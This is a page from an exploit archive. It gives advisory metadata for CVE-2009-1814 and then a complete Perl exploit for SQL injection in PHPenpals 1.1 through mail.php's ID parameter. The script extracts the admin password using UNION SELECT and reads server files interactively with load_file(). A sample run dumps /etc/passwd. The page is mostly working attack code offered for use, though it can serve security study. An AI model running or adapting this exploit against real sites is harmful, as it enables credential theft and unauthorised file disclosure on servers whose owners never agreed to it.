PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit

2009.06.01
Credit: Br0ly
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1814
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!usr/bin/perl #|------------------------------------------------------------------------------------------------------------------ #| -Info: # #| -Name: Phpenpals #| -Version: <= 1.1 #| -Site: http://sourceforge.net/projects/phpenpals/ #| -Download Script: http://sourceforge.net/project/showfiles.php?group_id=40166&package_id=32303&release_id=250717 #| -Bug: Sql Injection #| -Found: by Br0ly #| -BRAZIL >D #| -Contact: br0ly.Code@gmail.com #| #| -Gretz: Osirys , xs86 , 6_Bl4ck9_f0x6 , str0ke #| #| -p0c: #| -SQL INJECTION: #| #| -http://localhost/Scripts/phpenpals/mail.php?ID=-1+union+select+1,@@version-- #| -Vuls: @array = ('profile.php?personalID=' , 'mail.php?ID=') #| #| - You just need pass of the admin for login in: #| - http://localhost/Scripts/phpenpals/admin.php #| #| -Exploit: Demo: #|------------------------------------------------------------------------------------------------------------------ #| #| perl phpenpals.txt http://localhost/Scripts/phpenpals/ 1 #| #| -------------------------------------- #| -Phpenpals #| -Sql Injection #| -by Br0ly #| -------------------------------------- #| #|[+] Getting the pass of the admin. #|[+] Password = admin #| #|perl phpenpals.txt http://localhost/Scripts/phpenpals/ 2 #| #| -------------------------------------- #| -Phpenpals #| -Sql Injection #| -by Br0ly #| -------------------------------------- #| #|[*] Cat:/etc/passwd #| #| #|root:x:0:0:root:/root:/bin/bash #|daemon:x:1:1:daemon:/usr/sbin:/bin/sh #|bin:x:2:2:bin:/bin:/bin/sh #|sys:x:3:3:sys:/dev:/bin/sh #|sync:x:4:65534:sync:/bin:/bin/sync #|games:x:5:60:games:/usr/games:/bin/sh #|man:x:6:12:man:/var/cache/man:/bin/sh #|lp:x:7:7:lp:/var/spool/lpd:/bin/sh #| #| ;D #| And sorry for my bad english ;/ #| use IO::Socket::INET; use LWP::UserAgent; my $host = $ARGV[0]; my $opcao = $ARGV[1]; my $sql_path = "/mail.php?ID="; if (@ARGV < 2) { &banner(); &help("-1"); } elsif(cheek($host,$opcao) == 1) { &banner(); &xploit($host,$opcao,$sql_path); } else { &banner(); help("-2"); } sub xploit() { my $host = $_[0]; my $opcao = $_[1]; my $sql_path = $_[2]; if($opcao == 1) { &adm_pass($host,$sql_path); } if($opcao == 2) { &file_load($host,$sql_path); } } sub adm_pass() { print "[+] Getting the pass of the admin.\n"; my $host = $_[0]; my $spl_path = $_[1]; my $sql_atk = $host.$spl_path."-1+union+select+1,concat(0x6272306c79,0x3a,password,0x3a,0x6272306c79)+from+admin--"; my $re = get_url($sql_atk); if($re =~ /br0ly:(.+):br0ly/) { print "[+] Password = $1\n"; exit(0); } else { print "[-] Exploit, Fail\n"; exit(0); } } sub file_load() { my $host = $_[0]; my $spl_path = $_[1]; print "[*] Cat:"; my $file = <STDIN>; chomp($file); $file !~ /exit/ || die "[-] Quitting ..\n"; if ($file !~ /\/(.*)/) { print "\n[-] Bad filename !\n"; &file_load($host,$spl_path); } my $fencode = hex_str($file); my $byte = "0x"; my $fl_atk = $host.$spl_path."-1+union+select+1,load_file(".$byte.$fencode.")--"; my $re = get_url($fl_atk); my $content = tag($re); if ($content =~ /<table>\*\*<tr><td>(.+)<\/td><td><\/td><\/tr>/) { my $out = $1; $out =~ s/\$/ /g; $out =~ s/\*\*\*\*/ /g; $out =~ s/\*/\n/g; $out =~ s/Send/ /g; $out =~ s/email/ /g; $out =~ s/to/ /g; $out =~ s/$out/$out\n/ if ($out !~ /\n$/); print "$out"; &file_load($host,$spl_path); if($out =~ ' ') { $c++; print "[-] Can't find ".$file." \n"; if ( $c < 3 ) { print "[-] Exploit Fail\n\n"; &file_load($host,$spl_path); } else { exit(0); } } } } sub get_url() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; } sub tag() { my $string = $_[0]; $string =~ s/ /\$/g; $string =~ s/\s/\*/g; return($string); } sub hex_str () { my $str_1 = $_[0]; my $str_hex = unpack('H*', "$str_1"); return $str_hex; } sub cheek() { my $host = $_[0]; my $opcao = $_[1]; if (($host =~ /http:\/\/(.*)/) && (($opcao == 1 || $opcao == 2))) { return 1; } else { return 0; } } sub help() { my $error = $_[0]; if ($error == -1) { print "\n[-] Error, missed some arguments !\n\n"; } elsif ($error == -2) { print "\n[-] Error, Bad arguments !\n\n"; } print "[*] Usage : perl $0 http://localhost/phpenpals/ opcao \n"; print " Ex: perl $0 http://localhost/phpenpals/ 1\n"; print "[*] opcao 1 : adm pass\n"; print "[*] opcao 2 : file_disc\n"; exit(0); } sub banner { print "\n". " --------------------------------------\n". " -Phpenpals \n". " -Sql Injection \n". " -by Br0ly \n". " --------------------------------------\n\n"; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top